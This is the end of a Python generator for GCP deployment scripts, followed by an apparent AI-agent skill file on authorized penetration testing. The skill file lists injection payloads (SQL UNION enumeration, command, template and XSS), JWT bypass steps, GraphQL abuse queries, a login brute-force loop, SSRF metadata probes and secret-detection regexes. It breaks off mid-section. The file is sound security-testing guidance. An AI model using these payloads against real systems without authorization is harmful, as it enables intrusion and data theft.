gsutil mb -l $REGION gs://$BUCKET_NAME/ || echo "Bucket already exists"
gsutil iam ch allUsers:objectViewer gs://$BUCKET_NAME
# 9. Set up Cloud Monitoring alerting
echo "Setting up monitoring..."
gcloud alpha monitoring policies create \\
--notification-channels="" \\
--display-name="$APP_NAME High Error Rate" \\
--condition-display-name="Cloud Run 5xx Error Rate" \\
--condition-filter='resource.type="cloud_run_revision" AND metric.type="run.googleapis.com/request_count" AND metric.labels.response_code_class="5xx"' \\
--condition-threshold-value=10 \\
--condition-threshold-duration=60s \\
|| echo "Alert policy creation requires additional configuration"
# 10. Output deployment info
echo ""
echo "=== Deployment Complete ==="
SERVICE_URL=$(gcloud run services describe $APP_NAME-api --region $REGION --format 'value(status.url)')
echo "Cloud Run URL: $SERVICE_URL"
echo "Static Bucket: gs://$BUCKET_NAME"
echo "Firestore: https://console.cloud.google.com/firestore?project=$PROJECT_ID"
echo "Monitoring: https://console.cloud.google.com/monitoring?project=$PROJECT_ID"
"""
def _gcloud_gke_microservices(self) -> str:
"""Generate gcloud script for GKE microservices pattern."""
return f"""#!/bin/bash
# GCP GKE Microservices Deployment Script
# Application: {self.app_name}
# Region: {self.region}
# Pattern: GKE Autopilot + Cloud SQL + Memorystore
set -euo pipefail
PROJECT_ID="{self.project_id}"
REGION="{self.region}"
APP_NAME="{self.app_name}"
ENVIRONMENT="${{ENVIRONMENT:-dev}}"
CLUSTER_NAME="${{APP_NAME}}-cluster"
NETWORK_NAME="${{APP_NAME}}-vpc"
echo "=== Deploying $APP_NAME GKE Microservices ($ENVIRONMENT) ==="
# 1. Set project
gcloud config set project $PROJECT_ID
# 2. Enable required APIs
echo "Enabling required APIs..."
gcloud services enable \\
container.googleapis.com \\
sqladmin.googleapis.com \\
redis.googleapis.com \\
cloudbuild.googleapis.com \\
artifactregistry.googleapis.com \\
secretmanager.googleapis.com \\
servicenetworking.googleapis.com \\
compute.googleapis.com
# 3. Create VPC network
echo "Creating VPC network..."
gcloud compute networks create $NETWORK_NAME \\
--subnet-mode=auto \\
|| echo "Network already exists"
# Allocate IP range for private services
gcloud compute addresses create google-managed-services-$NETWORK_NAME \\
--global \\
--purpose=VPC_PEERING \\
--prefix-length=16 \\
--network=$NETWORK_NAME \\
|| echo "IP range already exists"
gcloud services vpc-peerings connect \\
--service=servicenetworking.googleapis.com \\
--ranges=google-managed-services-$NETWORK_NAME \\
--network=$NETWORK_NAME \\
|| echo "VPC peering already exists"
# 4. Create GKE Autopilot cluster
echo "Creating GKE Autopilot cluster..."
gcloud container clusters create-auto $CLUSTER_NAME \\
--region $REGION \\
--network $NETWORK_NAME \\
--release-channel regular \\
--enable-master-authorized-networks \\
--enable-private-nodes \\
|| echo "Cluster already exists"
# 5. Get cluster credentials
gcloud container clusters get-credentials $CLUSTER_NAME --region $REGION
# 6. Create Cloud SQL instance
echo "Creating Cloud SQL instance..."
gcloud sql instances create $APP_NAME-db \\
--database-version=POSTGRES_15 \\
--tier=db-custom-2-8192 \\
--region=$REGION \\
--network=$NETWORK_NAME \\
--no-assign-ip \\
--availability-type=regional \\
--backup-start-time=02:00 \\
--storage-auto-increase \\
|| echo "Cloud SQL instance already exists"
# Create database
gcloud sql databases create $APP_NAME \\
--instance=$APP_NAME-db \\
|| echo "Database already exists"
# 7. Create Memorystore Redis instance
echo "Creating Memorystore Redis instance..."
gcloud redis instances create $APP_NAME-cache \\
--size=1 \\
--region=$REGION \\
--redis-version=redis_7_0 \\
--network=$NETWORK_NAME \\
--tier=basic \\
|| echo "Redis instance already exists"
# 8. Configure Workload Identity
echo "Configuring Workload Identity..."
SA_NAME="${{APP_NAME}}-workload"
gcloud iam service-accounts create $SA_NAME \\
--display-name="$APP_NAME Workload Identity SA" \\
|| echo "Service account already exists"
gcloud projects add-iam-policy-binding $PROJECT_ID \\
--member="serviceAccount:$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com" \\
--role="roles/cloudsql.client"
gcloud iam service-accounts add-iam-policy-binding \\
$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com \\
--role="roles/iam.workloadIdentityUser" \\
--member="serviceAccount:$PROJECT_ID.svc.id.goog[default/$SA_NAME]"
echo ""
echo "=== GKE Cluster Ready ==="
echo "Cluster: $CLUSTER_NAME"
echo "Cloud SQL: $APP_NAME-db"
echo "Redis: $APP_NAME-cache"
echo ""
echo "Next: Apply Kubernetes manifests with 'kubectl apply -f k8s/'"
"""
def _gcloud_data_pipeline(self) -> str:
"""Generate gcloud script for data pipeline pattern."""
return f"""#!/bin/bash
# GCP Data Pipeline Deployment Script
# Application: {self.app_name}
# Region: {self.region}
# Pattern: Pub/Sub + Dataflow + BigQuery
set -euo pipefail
PROJECT_ID="{self.project_id}"
REGION="{self.region}"
APP_NAME="{self.app_name}"
echo "=== Deploying $APP_NAME Data Pipeline ==="
# 1. Set project
gcloud config set project $PROJECT_ID
# 2. Enable required APIs
echo "Enabling required APIs..."
gcloud services enable \\
pubsub.googleapis.com \\
dataflow.googleapis.com \\
bigquery.googleapis.com \\
storage.googleapis.com \\
monitoring.googleapis.com
# 3. Create Pub/Sub topic and subscription
echo "Creating Pub/Sub resources..."
gcloud pubsub topics create $APP_NAME-events \\
|| echo "Topic already exists"
gcloud pubsub subscriptions create $APP_NAME-events-sub \\
--topic=$APP_NAME-events \\
--ack-deadline=60 \\
--message-retention-duration=7d \\
|| echo "Subscription already exists"
# Dead letter topic
gcloud pubsub topics create $APP_NAME-events-dlq \\
|| echo "DLQ topic already exists"
gcloud pubsub subscriptions update $APP_NAME-events-sub \\
--dead-letter-topic=$APP_NAME-events-dlq \\
--max-delivery-attempts=5
# 4. Create BigQuery dataset and table
echo "Creating BigQuery resources..."
bq mk --dataset --location=$REGION $PROJECT_ID:${{APP_NAME//-/_}}_analytics \\
|| echo "Dataset already exists"
bq mk --table \\
$PROJECT_ID:${{APP_NAME//-/_}}_analytics.events \\
event_id:STRING,event_type:STRING,payload:STRING,timestamp:TIMESTAMP,processed_at:TIMESTAMP \\
--time_partitioning_type=DAY \\
--time_partitioning_field=timestamp \\
--clustering_fields=event_type \\
|| echo "Table already exists"
# 5. Create Cloud Storage bucket for Dataflow temp/staging
echo "Creating staging bucket..."
STAGING_BUCKET="${{PROJECT_ID}}-${{APP_NAME}}-dataflow"
gsutil mb -l $REGION gs://$STAGING_BUCKET/ || echo "Bucket already exists"
# 6. Create service account for Dataflow
echo "Creating Dataflow service account..."
SA_NAME="${{APP_NAME}}-dataflow-sa"
gcloud iam service-accounts create $SA_NAME \\
--display-name="$APP_NAME Dataflow Worker SA" \\
|| echo "Service account already exists"
for ROLE in roles/dataflow.worker roles/bigquery.dataEditor roles/pubsub.subscriber roles/storage.objectAdmin; do
gcloud projects add-iam-policy-binding $PROJECT_ID \\
--member="serviceAccount:$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com" \\
--role="$ROLE" \\
--condition=None
done
echo ""
echo "=== Data Pipeline Infrastructure Ready ==="
echo "Pub/Sub Topic: $APP_NAME-events"
echo "BigQuery Dataset: ${{APP_NAME//-/_}}_analytics"
echo "Staging Bucket: gs://$STAGING_BUCKET"
echo ""
echo "Next: Deploy Dataflow job with Apache Beam pipeline"
echo " python -m apache_beam.examples.streaming_wordcount \\\\"
echo " --runner DataflowRunner \\\\"
echo " --project $PROJECT_ID \\\\"
echo " --region $REGION \\\\"
echo " --temp_location gs://$STAGING_BUCKET/temp"
"""
def generate_terraform_configuration(self) -> str:
"""
Generate Terraform configuration for the selected pattern.
Returns:
Terraform HCL configuration as string
"""
if self.pattern == 'serverless_web':
return self._terraform_serverless_web()
elif self.pattern == 'gke_microservices':
return self._terraform_gke_microservices()
else:
return self._terraform_serverless_web()
def _terraform_serverless_web(self) -> str:
"""Generate Terraform for serverless web pattern."""
return f"""terraform {{
required_version = ">= 1.0"
required_providers {{
google = {{
source = "hashicorp/google"
version = "~> 5.0"
}}
}}
}}
provider "google" {{
project = var.project_id
region = var.region
}}
variable "project_id" {{
description = "GCP project ID"
type = string
}}
variable "region" {{
description = "GCP region"
type = string
default = "{self.region}"
}}
variable "environment" {{
description = "Environment name"
type = string
default = "dev"
}}
variable "app_name" {{
description = "Application name"
type = string
default = "{self.app_name}"
}}
# Enable required APIs
resource "google_project_service" "apis" {{
for_each = toset([
"run.googleapis.com",
"firestore.googleapis.com",
"secretmanager.googleapis.com",
"artifactregistry.googleapis.com",
"monitoring.googleapis.com",
])
project = var.project_id
service = each.value
}}
# Service Account for Cloud Run
resource "google_service_account" "cloud_run" {{
account_id = "${{var.app_name}}-run-sa"
display_name = "${{var.app_name}} Cloud Run Service Account"
}}
resource "google_project_iam_member" "firestore_user" {{
project = var.project_id
role = "roles/datastore.user"
member = "serviceAccount:${{google_service_account.cloud_run.email}}"
}}
resource "google_project_iam_member" "secret_accessor" {{
project = var.project_id
role = "roles/secretmanager.secretAccessor"
member = "serviceAccount:${{google_service_account.cloud_run.email}}"
}}
# Firestore Database
resource "google_firestore_database" "default" {{
project = var.project_id
name = "(default)"
location_id = var.region
type = "FIRESTORE_NATIVE"
depends_on = [google_project_service.apis["firestore.googleapis.com"]]
}}
# Cloud Run Service
resource "google_cloud_run_v2_service" "api" {{
name = "${{var.environment}}-${{var.app_name}}-api"
location = var.region
template {{
service_account = google_service_account.cloud_run.email
containers {{
image = "${{var.region}}-docker.pkg.dev/${{var.project_id}}/${{var.app_name}}/${{var.app_name}}:latest"
resources {{
limits = {{
cpu = "1000m"
memory = "512Mi"
}}
}}
env {{
name = "PROJECT_ID"
value = var.project_id
}}
env {{
name = "ENVIRONMENT"
value = var.environment
}}
}}
scaling {{
min_instance_count = 0
max_instance_count = 10
}}
}}
depends_on = [google_project_service.apis["run.googleapis.com"]]
labels = {{
environment = var.environment
app = var.app_name
}}
}}
# Allow unauthenticated access (public API)
resource "google_cloud_run_v2_service_iam_member" "public" {{
project = var.project_id
location = var.region
name = google_cloud_run_v2_service.api.name
role = "roles/run.invoker"
member = "allUsers"
}}
# Cloud Storage bucket for static assets
resource "google_storage_bucket" "static" {{
name = "${{var.project_id}}-${{var.app_name}}-static"
location = var.region
uniform_bucket_level_access = true
website {{
main_page_suffix = "index.html"
not_found_page = "404.html"
}}
lifecycle_rule {{
condition {{
age = 30
}}
action {{
type = "SetStorageClass"
storage_class = "NEARLINE"
}}
}}
labels = {{
environment = var.environment
app = var.app_name
}}
}}
# Outputs
output "cloud_run_url" {{
description = "Cloud Run service URL"
value = google_cloud_run_v2_service.api.uri
}}
output "static_bucket" {{
description = "Static assets bucket name"
value = google_storage_bucket.static.name
}}
output "service_account" {{
description = "Cloud Run service account email"
value = google_service_account.cloud_run.email
}}
"""
def _terraform_gke_microservices(self) -> str:
"""Generate Terraform for GKE microservices pattern."""
return f"""terraform {{
required_version = ">= 1.0"
required_providers {{
google = {{
source = "hashicorp/google"
version = "~> 5.0"
}}
}}
}}
provider "google" {{
project = var.project_id
region = var.region
}}
variable "project_id" {{
description = "GCP project ID"
type = string
}}
variable "region" {{
description = "GCP region"
type = string
default = "{self.region}"
}}
variable "environment" {{
description = "Environment name"
type = string
default = "dev"
}}
variable "app_name" {{
description = "Application name"
type = string
default = "{self.app_name}"
}}
# Enable required APIs
resource "google_project_service" "apis" {{
for_each = toset([
"container.googleapis.com",
"sqladmin.googleapis.com",
"redis.googleapis.com",
"servicenetworking.googleapis.com",
"secretmanager.googleapis.com",
])
project = var.project_id
service = each.value
}}
# VPC Network
resource "google_compute_network" "main" {{
name = "${{var.app_name}}-vpc"
auto_create_subnetworks = false
}}
resource "google_compute_subnetwork" "main" {{
name = "${{var.app_name}}-subnet"
ip_cidr_range = "10.0.0.0/20"
region = var.region
network = google_compute_network.main.id
secondary_ip_range {{
range_name = "pods"
ip_cidr_range = "10.4.0.0/14"
}}
secondary_ip_range {{
range_name = "services"
ip_cidr_range = "10.8.0.0/20"
}}
}}
# GKE Autopilot Cluster
resource "google_container_cluster" "main" {{
name = "${{var.environment}}-${{var.app_name}}-cluster"
location = var.region
enable_autopilot = true
network = google_compute_network.main.name
subnetwork = google_compute_subnetwork.main.name
ip_allocation_policy {{
cluster_secondary_range_name = "pods"
services_secondary_range_name = "services"
}}
release_channel {{
channel = "REGULAR"
}}
depends_on = [google_project_service.apis["container.googleapis.com"]]
}}
# Private Services Access for Cloud SQL
resource "google_compute_global_address" "private_ip" {{
name = "private-ip-range"
purpose = "VPC_PEERING"
address_type = "INTERNAL"
prefix_length = 16
network = google_compute_network.main.id
}}
resource "google_service_networking_connection" "private_vpc" {{
network = google_compute_network.main.id
service = "servicenetworking.googleapis.com"
reserved_peering_ranges = [google_compute_global_address.private_ip.name]
}}
# Cloud SQL PostgreSQL
resource "google_sql_database_instance" "main" {{
name = "${{var.environment}}-${{var.app_name}}-db"
database_version = "POSTGRES_15"
region = var.region
settings {{
tier = "db-custom-2-8192"
availability_type = "REGIONAL"
backup_configuration {{
enabled = true
start_time = "02:00"
point_in_time_recovery_enabled = true
}}
ip_configuration {{
ipv4_enabled = false
private_network = google_compute_network.main.id
}}
disk_autoresize = true
}}
depends_on = [google_service_networking_connection.private_vpc]
}}
resource "google_sql_database" "app" {{
name = var.app_name
instance = google_sql_database_instance.main.name
}}
# Memorystore Redis
resource "google_redis_instance" "cache" {{
name = "${{var.environment}}-${{var.app_name}}-cache"
tier = "BASIC"
memory_size_gb = 1
region = var.region
redis_version = "REDIS_7_0"
authorized_network = google_compute_network.main.id
depends_on = [google_project_service.apis["redis.googleapis.com"]]
labels = {{
environment = var.environment
app = var.app_name
}}
}}
# Outputs
output "cluster_name" {{
description = "GKE cluster name"
value = google_container_cluster.main.name
}}
output "cloud_sql_connection" {{
description = "Cloud SQL connection name"
value = google_sql_database_instance.main.connection_name
}}
output "redis_host" {{
description = "Memorystore Redis host"
value = google_redis_instance.cache.host
}}
"""
def main():
parser = argparse.ArgumentParser(
description='GCP Deployment Manager - Generates gcloud CLI scripts and Terraform configurations'
)
parser.add_argument(
'--app-name', '-a',
type=str,
required=True,
help='Application name'
)
parser.add_argument(
'--pattern', '-p',
type=str,
choices=['serverless_web', 'gke_microservices', 'data_pipeline'],
default='serverless_web',
help='Architecture pattern (default: serverless_web)'
)
parser.add_argument(
'--region', '-r',
type=str,
default='us-central1',
help='GCP region (default: us-central1)'
)
parser.add_argument(
'--project-id',
type=str,
default='my-project',
help='GCP project ID (default: my-project)'
)
parser.add_argument(
'--format', '-f',
type=str,
choices=['gcloud', 'terraform', 'both'],
default='both',
help='Output format (default: both)'
)
parser.add_argument(
'--output', '-o',
type=str,
help='Output directory for generated files'
)
parser.add_argument(
'--json',
action='store_true',
help='Output as JSON format'
)
args = parser.parse_args()
requirements = {
'pattern': args.pattern,
'region': args.region,
'project_id': args.project_id
}
manager = DeploymentManager(args.app_name, requirements)
if args.json:
output = {}
if args.format in ('gcloud', 'both'):
output['gcloud_script'] = manager.generate_gcloud_script()
if args.format in ('terraform', 'both'):
output['terraform_config'] = manager.generate_terraform_configuration()
print(json.dumps(output, indent=2))
elif args.output:
import os
os.makedirs(args.output, exist_ok=True)
if args.format in ('gcloud', 'both'):
gcloud_path = os.path.join(args.output, 'deploy.sh')
with open(gcloud_path, 'w') as f:
f.write(manager.generate_gcloud_script())
os.chmod(gcloud_path, 0o755)
print(f"gcloud script written to {gcloud_path}")
if args.format in ('terraform', 'both'):
tf_path = os.path.join(args.output, 'main.tf')
with open(tf_path, 'w') as f:
f.write(manager.generate_terraform_configuration())
print(f"Terraform config written to {tf_path}")
else:
if args.format in ('gcloud', 'both'):
print("# ===== gcloud CLI Script =====")
print(manager.generate_gcloud_script())
if args.format in ('terraform', 'both'):
print("# ===== Terraform Configuration =====")
print(manager.generate_terraform_configuration())
if __name__ == '__main__':
main()

View File

@@ -0,0 +1,850 @@
---
name: "security-pen-testing"
description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security assessments. Covers static analysis, dependency scanning, secret detection, API security testing, and pen test report generation."
---
# Security Penetration Testing
Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing.
---
## Table of Contents
- [Overview](#overview)
- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit)
- [Static Analysis](#static-analysis)
- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning)
- [Secret Scanning](#secret-scanning)
- [API Security Testing](#api-security-testing)
- [Web Vulnerability Testing](#web-vulnerability-testing)
- [Infrastructure Security](#infrastructure-security)
- [Pen Test Report Generation](#pen-test-report-generation)
- [Responsible Disclosure Workflow](#responsible-disclosure-workflow)
- [Workflows](#workflows)
- [Anti-Patterns](#anti-patterns)
- [Cross-References](#cross-references)
---
## Overview
### What This Skill Does
This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security.
### Distinction from Other Security Skills
| Skill | Focus | Approach |
|-------|-------|----------|
| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques |
| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM |
| senior-security | Security policy | Governance — policies, frameworks, risk registers |
| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks |
### Prerequisites
All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting.
---
## OWASP Top 10 Systematic Audit
Use the vulnerability scanner tool for automated checklist generation:
```bash
# Generate OWASP checklist for a web application
python scripts/vulnerability_scanner.py --target web --scope full
# Quick API-focused scan
python scripts/vulnerability_scanner.py --target api --scope quick --json
```
### A01:2021 — Broken Access Control
**Test Procedures:**
1. Attempt horizontal privilege escalation: access another user's resources by changing IDs
2. Test vertical escalation: access admin endpoints with regular user tokens
3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards
4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`)
5. Modify JWT claims (`role`, `is_admin`) and replay tokens
**What to Look For:**
- Missing authorization checks on API endpoints
- Predictable resource IDs (sequential integers vs. UUIDs)
- Client-side only access controls (hidden UI elements without server checks)
- CORS misconfigurations allowing arbitrary origins
### A02:2021 — Cryptographic Failures
**Test Procedures:**
1. Check TLS version — reject anything below TLS 1.2
2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor
3. Look for sensitive data in URLs (tokens in query params get logged)
4. Check for hardcoded encryption keys in source code
5. Test for weak random number generation (Math.random() for tokens)
**What to Look For:**
- MD5/SHA1 used for password hashing
- Secrets in environment variables without encryption at rest
- Missing `Strict-Transport-Security` header
- Self-signed certificates in production
### A03:2021 — Injection
**Test Procedures:**
1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads
2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies
3. Command injection: test inputs with `; whoami` and backtick substitution
4. LDAP injection: test with `*)(uid=*))(|(uid=*`
5. Template injection: test with `{{7*7}}` and `${7*7}`
**What to Look For:**
- String concatenation in SQL queries
- User input passed to `eval()`, `exec()`, `os.system()`
- Unparameterized ORM queries
- Template engines rendering user input without sandboxing
### A04:2021 — Insecure Design
**Test Procedures:**
1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts)
2. Check rate limiting on sensitive operations (login, password reset, OTP)
3. Test multi-step flows for state manipulation (skip payment step)
4. Verify security questions aren't guessable
**What to Look For:**
- Missing rate limits on authentication endpoints
- Business logic that trusts client-side calculations
- Lack of account lockout after failed attempts
- Missing CAPTCHA on public-facing forms
### A05:2021 — Security Misconfiguration
**Test Procedures:**
1. Check for default credentials on admin panels
2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints)
3. Check error handling — stack traces should never leak to users
4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options)
5. Check directory listing is disabled
**What to Look For:**
- Debug mode enabled in production
- Default admin:admin credentials
- Verbose error messages with stack traces
- Missing security headers
### A06:2021 — Vulnerable and Outdated Components
**Test Procedures:**
1. Run dependency audit against known CVE databases
2. Check for end-of-life frameworks and libraries
3. Verify transitive dependency versions
4. Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1)
```bash
# Audit a package manifest
python scripts/dependency_auditor.py --file package.json --severity high
python scripts/dependency_auditor.py --file requirements.txt --json
```
### A07:2021 — Identification and Authentication Failures
**Test Procedures:**
1. Test brute force protection on login endpoints
2. Check password policy enforcement (minimum length, complexity)
3. Verify session invalidation on logout and password change
4. Test "remember me" token security (HttpOnly, Secure, SameSite flags)
5. Check multi-factor authentication bypass paths
**What to Look For:**
- Sessions that persist after logout
- Missing `HttpOnly` and `Secure` flags on session cookies
- Password reset tokens that don't expire
- Username enumeration via different error messages
### A08:2021 — Software and Data Integrity Failures
**Test Procedures:**
1. Check for unsigned updates or deployment artifacts
2. Verify CI/CD pipeline integrity (signed commits, protected branches)
3. Test deserialization endpoints with crafted payloads
4. Check for SRI (Subresource Integrity) on CDN-loaded scripts
**What to Look For:**
- Unsafe deserialization of user input (pickle, Java serialization)
- Missing integrity checks on downloaded artifacts
- CI/CD pipelines running untrusted code
- CDN scripts without SRI hashes
### A09:2021 — Security Logging and Monitoring Failures
**Test Procedures:**
1. Verify authentication events are logged (success and failure)
2. Check that logs don't contain sensitive data (passwords, tokens, PII)
3. Test alerting thresholds (do 50 failed logins trigger an alert?)
4. Verify log integrity — can an attacker tamper with logs?
**What to Look For:**
- Missing audit trail for admin actions
- Passwords or tokens appearing in logs
- No alerting on suspicious patterns
- Logs stored without integrity protection
### A10:2021 — Server-Side Request Forgery (SSRF)
**Test Procedures:**
1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata)
2. Check for open redirect chains that reach internal services
3. Test with DNS rebinding payloads
4. Verify allowlist validation on outbound requests
**What to Look For:**
- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl`
- Missing allowlist on outbound HTTP requests
- Ability to reach cloud metadata endpoints (AWS, GCP, Azure)
- PDF generators or screenshot services that fetch arbitrary URLs
---
## Static Analysis
### CodeQL Custom Rules
Write custom CodeQL queries for project-specific vulnerability patterns:
```ql
/**
* Detect SQL injection via string concatenation
*/
import python
import semmle.python.dataflow.new.DataFlow
from Call call, StringFormatting fmt
where
call.getFunc().getName() = "execute" and
fmt = call.getArg(0) and
exists(DataFlow::Node source |
source.asExpr() instanceof Name and
DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand()))
)
select call, "Potential SQL injection: user input flows into execute()"
```
### Semgrep Custom Rules
Create project-specific Semgrep rules:
```yaml
rules:
- id: hardcoded-jwt-secret
pattern: |
jwt.encode($PAYLOAD, "...", ...)
message: "JWT signed with hardcoded secret"
severity: ERROR
languages: [python]
- id: unsafe-yaml-load
pattern: yaml.load($DATA)
fix: yaml.safe_load($DATA)
message: "Use yaml.safe_load() to prevent arbitrary code execution"
severity: WARNING
languages: [python]
- id: express-no-helmet
pattern: |
const app = express();
...
app.listen(...)
pattern-not: |
const app = express();
...
app.use(helmet(...));
...
app.listen(...)
message: "Express app missing helmet middleware for security headers"
severity: WARNING
languages: [javascript, typescript]
```
### ESLint Security Plugins
Recommended configuration:
```json
{
"plugins": ["security", "no-unsanitized"],
"extends": ["plugin:security/recommended"],
"rules": {
"security/detect-object-injection": "error",
"security/detect-non-literal-regexp": "warn",
"security/detect-unsafe-regex": "error",
"security/detect-buffer-noassert": "error",
"security/detect-eval-with-expression": "error",
"no-unsanitized/method": "error",
"no-unsanitized/property": "error"
}
}
```
---
## Dependency Vulnerability Scanning
### Ecosystem-Specific Commands
```bash
# Node.js
npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")'
# Python
pip audit --format json --desc
safety check --json
# Go
govulncheck ./...
# Ruby
bundle audit check --update
```
### CVE Triage Workflow
1. **Collect**: Run ecosystem audit tools, aggregate findings
2. **Deduplicate**: Group by CVE ID across direct and transitive deps
3. **Score**: Use CVSS base score + environmental adjustments
4. **Prioritize**: Critical + exploitable + reachable = fix immediately
5. **Remediate**: Upgrade, patch, or mitigate with compensating controls
6. **Verify**: Rerun audit to confirm fix, update lock files
```bash
# Use the dependency auditor for automated triage
python scripts/dependency_auditor.py --file package.json --severity critical --json
```
### Known Vulnerable Patterns
| Package | Vulnerable Versions | CVE | Impact |
|---------|-------------------|-----|--------|
| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection |
| lodash | < 4.17.21 | CVE-2021-23337 | Prototype pollution |
| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure |
| pillow | < 9.3.0 | CVE-2022-45198 | DoS via crafted image |
| express | < 4.19.2 | CVE-2024-29041 | Open redirect |
---
## Secret Scanning
### TruffleHog Patterns
```bash
# Scan git history for secrets
trufflehog git file://. --only-verified --json
# Scan filesystem (no git history)
trufflehog filesystem . --json
```
### Gitleaks Configuration
```toml
# .gitleaks.toml
title = "Custom Gitleaks Config"
[[rules]]
id = "aws-access-key"
description = "AWS Access Key ID"
regex = '''AKIA[0-9A-Z]{16}'''
tags = ["aws", "credentials"]
[[rules]]
id = "generic-api-key"
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]'''
tags = ["api", "key"]
[[rules]]
id = "private-key"
description = "Private Key Header"
regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----'''
tags = ["private-key"]
[allowlist]
paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture''']
```
### Pre-commit Hook Integration
```yaml
# .pre-commit-config.yaml
repos:
- repo: https://github.com/gitleaks/gitleaks
rev: v8.18.0
hooks:
- id: gitleaks
- repo: https://github.com/trufflesecurity/trufflehog
rev: v3.63.0
hooks:
- id: trufflehog
args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"]
```
### CI Integration (GitHub Actions)
```yaml
name: Secret Scan
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- uses: trufflesecurity/trufflehog@main
with:
extra_args: --only-verified
```
---
## API Security Testing
### Authentication Bypass
**JWT Manipulation:**
1. Decode token at jwt.io — inspect claims without verification
2. Change `alg` to `none` and remove signature: `eyJ...payload.`
3. Change `alg` from RS256 to HS256 and sign with the public key
4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets
5. Test key confusion: HMAC signed with RSA public key bytes
**Session Fixation:**
1. Obtain a session token before authentication
2. Authenticate — check if the session ID changes
3. If the same session ID persists, the app is vulnerable to session fixation
### Authorization Flaws
**IDOR (Insecure Direct Object Reference):**
```
GET /api/users/123/profile → 200 (your profile)
GET /api/users/124/profile → 200 (someone else's profile — IDOR!)
GET /api/users/124/profile → 403 (properly protected)
```
Test pattern: Change numeric IDs, UUIDs, slugs in every endpoint. Use Burp Intruder or a simple script to iterate.
**BOLA (Broken Object Level Authorization):**
Same as IDOR but specifically in REST APIs. Test every CRUD operation:
- Can user A read user B's resource?
- Can user A update user B's resource?
- Can user A delete user B's resource?
**BFLA (Broken Function Level Authorization):**
```
# Regular user tries admin endpoints
POST /api/admin/users → Should be 403
DELETE /api/admin/users/123 → Should be 403
PUT /api/settings/global → Should be 403
```
### Rate Limiting Validation
Test rate limits on critical endpoints:
```bash
# Rapid-fire login attempts
for i in $(seq 1 100); do
curl -s -o /dev/null -w "%{http_code}" \
-X POST https://target.com/api/login \
-d '{"email":"test@test.com","password":"wrong"}';
done
# Expect: 429 after threshold (typically 5-10 attempts)
```
### Mass Assignment Detection
```bash
# Try adding admin fields to a regular update request
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com",
"role": "admin", # mass assignment attempt
"is_verified": true, # mass assignment attempt
"subscription": "enterprise" # mass assignment attempt
}
```
### GraphQL-Specific Testing
**Introspection Query:**
```graphql
{
__schema {
types { name fields { name type { name } } }
}
}
```
Introspection should be **disabled in production**.
**Query Depth Attack:**
```graphql
{
user(id: 1) {
friends {
friends {
friends {
friends { # Keep nesting until server crashes
name
}
}
}
}
}
}
```
**Batching Attack:**
```json
[
{"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"}
]
```
Batch mutations can bypass rate limiting if counted as a single request.
---
## Web Vulnerability Testing
### XSS (Cross-Site Scripting)
**Reflected XSS Test Payloads** (non-destructive):
```
<script>alert(document.domain)</script>
"><img src=x onerror=alert(document.domain)>
javascript:alert(document.domain)
<svg onload=alert(document.domain)>
'-alert(document.domain)-'
</script><script>alert(document.domain)</script>
```
**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check if they render for other users.
**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, `eval()` operating on `location.hash`, `location.search`, or `document.referrer`.
### CSRF Token Validation
1. Capture a legitimate request with CSRF token
2. Replay the request without the token — should fail (403)
3. Replay with a token from a different session — should fail
4. Check if token changes per request or is static per session
5. Verify `SameSite` cookie attribute is set to `Strict` or `Lax`
### SQL Injection
**Detection Payloads** (safe, non-destructive):
```
' OR '1'='1
' OR '1'='1' --
" OR "1"="1
1 OR 1=1
' UNION SELECT NULL--
' AND SLEEP(5)-- (time-based blind)
' AND 1=1-- (boolean-based blind)
```
**Union-Based Enumeration** (authorized testing only):
```sql
' UNION SELECT 1,2,3-- -- Find column count
' UNION SELECT table_name,2,3 FROM information_schema.tables--
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
```
**Time-Based Blind:**
```sql
